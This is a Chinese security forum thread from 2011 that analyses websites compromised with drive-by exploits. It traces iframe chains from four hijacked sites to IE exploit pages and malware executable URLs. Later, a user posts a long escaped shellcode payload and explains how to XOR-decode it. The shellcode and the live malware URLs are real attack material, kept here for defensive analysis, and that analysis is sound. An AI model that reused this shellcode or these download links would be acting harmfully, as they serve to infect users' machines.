瑞星卡卡安全论坛

首页 » 技术交流区 » 恶意网站交流 » 每日网马播报 » 瑞星网站每日安全播报(2011年3月18日)
networkedition - 2011-3-18 10:27:00


引用:
网址均来自瑞星每日安全播报,我们详细分析其中所挂恶意网址,对于已失效的恶意网址就不再分析。



引用:
注:以下分析出的恶意网址均包含有真实网马下载地址,请勿直接下载并运行,以免系统中招。



引用:


1.  http://health.china.com/(中华网健康频道-专业健康门户网站)
2.  http://www.cxkx.gov.cn/(长兴农民致富网)
3.  http://www.hcit.edu.cn/(欢迎访问淮安信息职业技术学院)
4.  http://www.qzkx.gov.cn/(衢州市科学技术协会)


用户系统信息:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6.6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
networkedition - 2011-3-18 10:28:00
Log generated by networkedition use mdecoder 0.67
[root]http://health.china.com/html/jiankangzhuanti/hblz/201009/02-79398.html(红斑狼疮发病年龄、种族、地区上有无差别?-中华网健康频道)
    [script]http://health.china.com/js/art_msn.js
    [script]http://health.china.com/templets/user_login.php
    [iframe]http://goon.27.cn/js/headad3.htm
        [script]http://cbjs.baidu.com/js/m.js
            [script]http://cbjs.baidu.com/js/+
    [iframe]http://goon.27.cn/js/headad2.htm
        [script]http://cbjs.baidu.com/js/m.js
    [iframe]http://goon.27.cn/js/headad1.htm
        [script]http://cbjs.baidu.com/js/m.js
    [iframe]http://goon.27.cn/js/top950.htm
        [script]http://cbjs.baidu.com/js/m.js
    [script]http://gogo.27.cn/js/7120_left_2.js
    [script]http://health.china.com/js/art_l_ad.js
    [script]http://health.china.com/js/hbht.js
        [iframe]http://goon.27.cn/js/newleft600.html
            [iframe]http://goon.27.cn/js/newleft600.asp
                [iframe]http://goon.27.cn/js/newleft600bj.htm
        [iframe]http://www.333eee.com/z.html
            [script]http://js.users.51.la/4472035.js
            [exp]http://ispm.3322.org:54321/wmzuo/zz.html(Exploit.Ie0dayCVE0806.a)
                [script]http://ispm.3322.org:54321/wmzuo/yt.jpg
                [virus]http://58.221.33.206:54321/zuo.exe
    [script]http://gogo.27.cn/js/7120_left_3.js
    [script]http://gogo.27.cn/js/7120_left_4.js
    [script]http://health.china.com/js/rmss.js
    [script]http://gogo.27.cn/js/7120_left_5.js
    [script]http://goon.27.cn/js/7120_left_gjc_6.js
    [script]http://health.china.com/js/art_r_ad.js
        [iframe]http://goon.27.cn/js/fq/article_r_ad.htm
            [iframe]http://goon.27.cn/js/fq/article_r_ad.asp
                [iframe]http://goon.27.cn/js/fq/article_r_ad_bj.htm
    [script]http://health.china.com/js/art_r_topnew.js
    [script]http://health.china.com/js/xtup.js
        [iframe]http://health.china.com/js/xtup.htm
    [iframe]http://goon.27.cn/js/right300.htm
        [iframe]http://goon.27.cn/js/right300.asp
            [script]http://cbjs.baidu.com/js/m.js
    [script]http://goon.27.cn/js/7120_right_hk.js
    [script]http://health.china.com/js/art_zttj.js
    [script]http://gogo.27.cn/js/7120_right_2.js
    [script]http://goon.27.cn/js/7120_right_7.js
    [script]http://gogo.27.cn/js/7120_right_4.js
    [script]http://health.china.com/js/new_tf_adv.js
networkedition - 2011-3-18 10:28:00
Log generated by networkedition use mdecoder 0.67
[root]http://www.cxkx.gov.cn/editor/css/best/lzg.htm
    [script]http://www.cxkx.gov.cn/editor/css/best/lzg.js
    [script]http://js.users.51.la/4036725.js
    [exp]http://www.cxkx.gov.cn/editor/css/mm/wmdn.html(Exploit.Ie0dayCVE0806.a)
        [virus]http://www.bjsjwmz.com/upload_files/dn.exe
    [exp]http://www.cxkx.gov.cn/editor/css/mm/wmdn1.html(Exploit.Ie0dayCVE0806.a)
        [virus]http://www.bjsjwmz.com/upload_files/lzg.exe
networkedition - 2011-3-18 10:28:00
Log generated by networkedition use mdecoder 0.67
[root]http://www.hcit.edu.cn/hcit2009/admin/inc/jjl/1.html(Exploit.Ie0dayCVE0806.a)
    [virus]http://qq.sbwanwan.com:9999/ll.exe
networkedition - 2011-3-18 10:29:00
Log generated by networkedition use mdecoder 0.67
[root]http://www.qzkx.gov.cn/inc/sgsj.htm?from=www.tzgtj.gov.cn
    [script]http://www.qzkx.gov.cn/inc/sgsj.js
    [script]http://js.users.51.la/4404580.js
    [exp]http://www.qzkx.gov.cn/inc/wmsgsj.html(Exploit.Ie0dayCVE0806.a)
        [script]http://www.qzkx.gov.cn/inc/yt.jpg
        [virus]http://www.bjsjwmz.com/upload_files/sgsj.exe
from_zo - 2011-3-18 16:46:00
老大
第一个:
[script]http://health.china.com/js/hbht.js
        [iframe]http://goon.27.cn/js/newleft600.html
            [iframe]http://goon.27.cn/js/newleft600.asp
                [iframe]http://goon.27.cn/js/newleft600bj.htm
        [iframe]http://www.333eee.com/z.html
freshow check出来的内容什么都没有,我把hbht.js文件下来后只能看到第一个iframe,看不到第二个333eee的iframe呢,是管理员把马删除了么,但是我直接访问hbht.js的时候,360拦截了,说是http://www.333eee.com/z.html为恶意界面,求解!
networkedition - 2011-3-18 16:48:00
判断cookie了吧
from_zo - 2011-3-18 16:51:00
第二个 在check  http://www.cxkx.gov.cn/editor/css/mm/wmdn.html的时候,freshow崩溃了,呵呵 反复了好几次 都这样,请问老大怎么解决的?
3Q
from_zo - 2011-3-18 16:53:00
请问怎么判断ni,cookie方面小白  ^_^
networkedition - 2011-3-18 17:00:00
正常啊, 你换decoder或md试试。
networkedition - 2011-3-18 17:01:00
那个恶意链接地址源代码里有吧,你清空cookie再看看。
from_zo - 2011-3-18 17:37:00
是将浏览器的cookie清除吧? 我试过了 还是check不出源代码  :kaka4:
能解详细点么?谢谢啦
from_zo - 2011-3-18 17:53:00
check后用var aaa4的值进行解密,
%u5858%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8'+ppsa+'%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDBE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E%uC6F5%u8F80%u2CC9%u38B1%u1262%uDE06%u6C34%uECF2%u07FD%u1DC2%u2AD8%uA376%uD919%u2E52%u598F%u3329%uB7AE%u7F11%uF6A4%u79BC%uA230%uEAC9%uB0DB%uFE42%u1103%uC066%u184D%uEF27%u1A43%u8367%u0BA0%u0584%u69D4%u03A6%uDBC2%u411D%u8A14%u2510%uADB7%u3D45%u126B%u4627%uA8EE%ud5db%uc9c9%u87cd%u9292%ucccc%uce93%ucadf%ud3dc%udcca%u93d3%ud2de%u87d0%u8484%u8484%ud192%u93d1%uc5d8%uBDd8%uBD%uEAEA%uEAEA%uEAEA%uEAEA
一次ESC后,\x58\x58\x58\x58\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\xB8\x03\x80\x34\x0B\xBD\xE2\xFA\xEB\x05\xE8\xEB'+ppsa+'\xFF\x54\xA3\xBE\xBD\xBD\xE2\xD9\x1C\x8D\xBD\xBD\xBD\x36\xFD\xB1\x36\xCD\xA1\x10\x36\xD5\xB5\x36\x4A\xD7\xAC\xE4\x55\x03\xBF\xBD\xBD\x2D\x5F\x45\xD5\x8E\x8F\xBD\xBD\xD5\xE8\xCE\xD8\xCF\xE9\x36\xFB\xB1\x55\x03\xBC\xBD\xBD\x36\x55\xD7\xB8\xE4\x55\x23\xBF\xBD\xBD\x5F\x44\xD5\xD2\xD3\xBD\xBD\xD5\xC8\xCF\xD1\xD0\xE9\x42\xAB\x38\x7D\xC8\xAE\xD5\xD2\xD3\xBD\xBD\xD5\xC8\xCF\xD1\xD0\xE9\x36\xFB\xB1\x55\x33\xBC\xBD\xBD\x36\x55\xD7\xBC\xE4\x55\xD3\xBF\xBD\xBD\x5F\x44\xD5\xD1\x8E\x8F\xBD\xD5\xCE\xD5\xD8\xD1\xE9\x36\xFB\xB1\x55\xD2\xBC\xBD\xBD\x36\x55\xD7\xBC\xE4\x55\xF2\xBF\xBD\xBD\x5F\x44\x3C\x51\xBD\xBC\xBD\xBD\x36\x61\x3C\x7E\x3D\xBD\xBD\xBD\xD7\xBD\xD7\xA7\xEE\xD7\xBD\x42\xEB\xE1\x8E\x7D\xFD\x3D\x81\xBE\xBD\xC8\x44\x7A\xB9\xBE\xE1\xDB\x93\xD8\x7A\xF9\xBE\xB9\xC5\xD8\xBD\xBD\x8E\x74\xEC\xEC\xEE\xEA\xEC\x8E\x7D\x36\xFB\xE5\x55\x9F\xBC\xBD\xBD\x3E\x45\xBD\x54\x1E\xBD\xBD\xBD\x2D\xD7\xBD\xD7\xBD\xD7\xBE\xD7\xBD\xD7\xBF\xD5\xBD\xBD\xBD\x7D\xEE\x36\xFB\x99\x55\xBC\xBC\xBD\xBD\x34\xFB\xDD\xD7\xBD\xED\x42\xEB\x95\x34\xFB\xD9\x36\xFB\xDD\xD7\xBD\xD7\xBD\xD7\xBD\xD7\xB9\xD7\xBD\xED\x42\xEB\x91\xD7\xBD\xD7\xBD\xD7\xBD\xD5\xA2\xBD\xB2\xBD\xED\x42\xEB\x81\x34\xFB\xC5\x36\xF3\xD9\x3D\xC1\xB5\x42\x09\xC9\xB1\x3D\xC1\xB5\x42\xBD\xC9\xB8\x3D\xC9\xB5\x42\x09\x5F\x56\x34\x3B\x3D\xBD\xBD\xBD\x7A\xFB\xCD\xBD\xBD\xBD\xBD\x7A\xFB\xC9\xBD\xBD\xBD\xBD\xD7\xBD\xD7\xBD\xD7\xBD\x36\xFB\xDD\xED\x42\xEB\x85\x36\x3B\x3D\xBD\xBD\xBD\xD7\xBD\x30\xF3\xC9\xEC\x42\xCB\xCD\xED\x42\xCB\xDD\x42\xEB\x8D\x42\xCB\xDD\x42\xEB\x89\x42\xCB\xC5\x42\xEB\xFD\x36\x46\x8E\x7D\x8E\x66\x3C\x51\xBD\xBF\xBD\xBD\x36\x71\x3E\x45\xE9\xC0\xB5\x34\xA1\xBC\x3E\x7D\xB9\x56\x4E\x36\x71\x36\x64\x3E\x7E\xAD\x8E\x7D\xED\xEC\xEE\xED\xED\xED\xED\xED\xED\xEA\xED\xED\x42\xEB\xB5\x36\xC3\xE9\x55\xAD\xBC\xBD\xBD\x55\xD8\xBD\xBD\xBD\xD5\xDE\xCB\xCA\xBD\xD5\xCE\xD5\xD9\xD2\xE9\x36\xFB\xB1\x55\x99\xBD\xBD\xBD\x34\xFB\x81\xD9\x1C\xB9\xBD\xBD\xBD\x30\x1D\xDD\x42\x42\x42\xD7\xD8\x42\xCB\x81\x36\xFB\xAD\x55\xB5\xBD\xBD\xBD\x8E\x66\xEE\xEE\xEE\xEE\x42\x6D\x3D\x85\x55\x3D\x85\x54\xC8\xAC\x3C\xC5\xB8\x2D\x2D\x2D\x2D\xC9\xB5\x36\x42\xE8\x36\x51\x30\xFD\xB8\x42\x5D\x55\x1B\xBD\xBD\xBD\x7E\x55\x1D\xBD\xBD\xBD\x05\xAC\xBC\xB9\x3D\x7F\xB1\xBD\x55\x2E\xBD\xBD\xBD\x3C\x51\xBD\xBC\xBD\xBD\x36\x41\x3E\x7A\xB9\x7A\xBA\x8F\xC9\x2C\xB1\x7A\xFA\xB9\xDE\x34\x6C\xF2\x7A\xFA\xB5\x1D\xD8\x2A\x76\x7A\xFA\xB1\xEC\xFD\x07\xC2\x7A\xFA\xAD\x83\xA0\x0B\x84\x7A\xFA\xA9\x05\xD4\x69\xA6\x7A\xFA\xA5\x03\xC2\xDB\x1D\x7A\xFA\xA1\x41\x14\x8A\x10\x7A\xFA\x9D\x25\xB7\xAD\x45\xD9\x1C\x8D\xBD\xBD\xBD\x36\xFD\xB1\x36\xCD\xA1\x10\x36\xD5\xB5\x36\x4A\xD7\xB9\xE4\x55\xE9\xBD\xBD\xBD\x2D\x5F\x45\xD5\x8E\x8F\xBD\xBD\xD5\xE8\xCE\xD8\xCF\xE9\x36\xBB\x55\xE8\x42\x42\x42\x36\x55\xD7\xB8\xE4\x55\x88\xBD\xBD\xBD\x5F\x44\x8E\x42\xEA\x42\xEB\xB9\x56\xBF\xE5\x7E\x55\x44\x42\x42\x42\xE6\x7B\xBA\x05\x34\xE2\xBC\xDB\x7A\xFA\xB8\x42\x5D\x7E\xEE\x36\x61\xEE\xD7\xFD\xD5\xBD\xAD\xBD\xBD\xEA\x36\xFB\x9D\x55\xA5\x42\x42\x42\xE5\x7E\xEC\xEB\x36\xC8\x81\x36\xC9\x93\xC5\xBE\x48\xEB\x36\xCB\x9D\xBE\x48\x8E\x74\xF4\xFC\x10\xBE\x78\x8E\x66\xB2\x03\xAD\x87\x6B\xC9\xB5\x7C\x76\xBA\xBE\x67\xFD\x56\x4C\x86\xA2\xC8\x5A\xE3\x36\xE3\x99\xBE\x60\xDB\x36\xB1\xF6\x36\xE3\xA1\xBE\x60\x36\xB9\x36\xBE\x78\x16\xE3\xE4\x7E\x55\x60\x41\x42\x42\x0F\x4F\x5F\x49\x84\x5F\xC0\x3E\x67\xF5\xC6\x80\x8F\xC9\x2C\xB1\x38\x62\x12\x06\xDE\x34\x6C\xF2\xEC\xFD\x07\xC2\x1D\xD8\x2A\x76\xA3\x19\xD9\x52\x2E\x8F\x59\x29\x33\xAE\xB7\x11\x7F\xA4\xF6\xBC\x79\x30\xA2\xC9\xEA\xDB\xB0\x42\xFE\x03\x11\x66\xC0\x4D\x18\x27\xEF\x43\x1A\x67\x83\xA0\x0B\x84\x05\xD4\x69\xA6\x03\xC2\xDB\x1D\x41\x14\x8A\x10\x25\xB7\xAD\x45\x3D\x6B\x12\x27\x46\xEE\xA8\xdb\xd5\xc9\xc9\xcd\x87\x92\x92\xcc\xcc\x93\xce\xdf\xca\xdc\xd3\xca\xdc\xd3\x93\xde\xd2\xd0\x87\x84\x84\x84\x84\x92\xd1\xd1\x93\xd8\xc5\xd8\xBD\x%u\xBDEAEA\xEA\xEA\xEA\xEA\xEA\xEA

在用enumXOR解密就可以
1
查看完整版本: 瑞星网站每日安全播报(2011年3月18日)
© 2000 - 2024 Rising Corp. Ltd.